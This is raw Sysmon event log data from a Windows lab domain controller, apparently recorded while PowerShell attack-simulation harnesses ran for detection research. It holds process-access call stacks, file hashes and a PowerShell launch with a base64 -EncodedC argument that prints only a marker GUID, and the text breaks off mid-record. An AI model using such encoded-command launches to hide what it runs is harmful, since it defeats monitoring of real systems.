16:52:21.723{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.723{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.723{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.723{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.741{05ADC7E1-6D45-603E-64AA-00000000AD01}7444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedC VwByAGkAdABlAC0ASABvAHMAdAAgAGIAOQBkADQAYQBiAGEANwAtADUAYQAyADUALQA0AGQAOQBkAC0AYgBhADcANgAtAGIAYgBkADEANwA2AGQAMwBkAGMAMABmAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.719{05ADC7E1-6D45-603E-63AA-00000000AD01}9500ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.606{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.606{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.575{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73FBFE23230F010D8F23A3DA197E4624,SHA256=339490F992BDE508D96F430C79802EC510616C6B04A2D8145CAA50596807D39F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.559{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.559{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:21.543{05ADC7E1-6D45-603E-63AA-00000000AD01}9500\PSHost.132591775414524037.9500.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.523{05ADC7E1-6D45-603E-63AA-00000000AD01}9500ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_aqmfxsa1.vbf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.523{05ADC7E1-6D45-603E-63AA-00000000AD01}9500ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_cpn1lijh.kpu.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.496{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_cpn1lijh.kpu.ps12021-03-02 16:52:21.496 10341000x80000000000000002235259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.481{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.481{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7BE40216C664D0D6A260B9F11DD736BC,SHA256=BA3C21AF2DD897030C9CA342B050CDA8B8E0DA3FC3A5892538148284B9416AB3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:21.450{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D45-603E-63AA-00000000AD01}9500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembl